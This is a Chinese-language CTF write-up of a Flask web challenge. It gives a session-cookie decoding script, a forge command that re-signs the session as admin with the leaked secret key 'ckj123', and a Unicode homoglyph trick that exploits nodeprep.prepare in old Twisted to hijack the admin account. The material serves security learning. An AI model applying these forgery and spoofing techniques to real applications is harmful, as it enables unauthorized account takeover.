考点:
1. flask session伪造
2. Unicode欺骗
先注册一个账号,然后登录进入chang_password页面看源代码,里面给了我们一个网址,进去下载一下
一、flask session伪造
了解flask session伪造
在传统PHP开发中,$_SESSION变量的内容默认会被保存在服务端的一个文件中,通过一个叫“PHPSESSID”的Cookie来区分用户。这类session是“服务端session”,用户看到的只是session的名称(一个随机字符串),其内容保存在服务端。
而flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,
我觉得大概意思就是,传统的php开发,session是保存在服务端我们看不到改不了,
而flask的session是保存在客户端的cookie中,我们可以看到,并且flask仅仅只对数据签名,
相当于加个身份证号码,并没有进行加密,虽然没有加密,但我们要进行伪造还要有SECRET_KEY,
这个就相当于身份证号码了。
想要细致了解的可要参考目录下的链接中看。
解题步骤:
我们登录的完可看到自己的session
把它复制下来用解密脚本解密(脚本出处:p佬)
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)
decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True
try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')
if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')
return session_json_serializer.loads(payload)
if __name__ == '__main__':
print(decryption(sys.argv[1].encode()))
解密完后我们就可以清楚的看到session中的内容和构造了,其中有个token,咱们了解一下token的生成方式
生成方式( 内部配置的私钥+有效期+用户的id )
有效期+用户的id,我们只要登录了就会自带,重点是这个私钥,而这个私钥,它在config.py中告诉我们了“ckj123”。这个私钥我感觉有点类似身份证号,不管你人名字怎么改,身份证号码变不了。
而在index.html中已经告诉我们只有session[‘name’] == 'admin’时才能拿到flag,所以我们就把解密后的name值改为admin呗,最后带上SECRET_KEY在加密一下呗
//index.html
{% include('header.html') %}
{% if current_user.is_authenticated %}
<h1 class="nav">Hello {{ session['name'] }}</h1>
{% endif %}
{% if current_user.is_authenticated and session['name'] == 'admin' %}
<h1 class="nav">hctf{xxxxxxxxx}</h1>
{% endif %}
<!-- you are not admin -->
<h1 class="nav">Welcome to hctf</h1>
{% include('footer.html') %}
利用加密脚本和源码中给的SECRET_KEY加密一下即可
python flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'1e64fd62946046b5c27b0e0c57aebab558b13043a87ea1ae8e5cb986426fa3d9187149035cc376882e27bc09284eefa41b41c22e2d02facaf4a46ddbf56226ea', 'csrf_token': b'52fc8bb5432576bfc1c7f05f7c0b8691664d8478', 'image': b'almy', 'name': 'admin', 'user_id': '10'}"
把我们利用SECRET_key加密生成的session带入,可以抓包改值。
go一下,拿到flag
二、Unicode欺骗
路由中有一个strlower函数,是用来改字母小写,并且登录,注册改密码中都有此函数
都是用strlower()来转小写,而python有转小写函数lower(),看一下strlower()
def strlower(username):
username = nodeprep.prepare(username)
return username
问题在nodeprep.prepare函数,在requirements.txt文件中发现Twisted==10.2.0,而最新版本要远大于他,所以应该会有漏洞,我们测一下有什么区别。
from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep
def strlower(name):
str = nodeprep.prepare(name)
return str
print (u'\u1d2c\u1d30\u1d39\u1d35\u1d3A')
print (strlower(u'\u1d2c\u1d30\u1d39\u1d35\u1d3A'))
print (strlower(strlower(u'\u1d2c\u1d30\u1d39\u1d35\u1d3A')))
//但我这边编译有问题,暂不清楚在哪。
可以看到第一次为?????,对应着我们注册的时候,第二次为ADMIN,对应着我们改登录时,第三次就变为admin,对应着改密码后重登时,此时就可以看到flag了。
参考:
p师傅的客户端 session 导致的安全问题
Python Web之flask session&格式化字符串漏洞
小白白@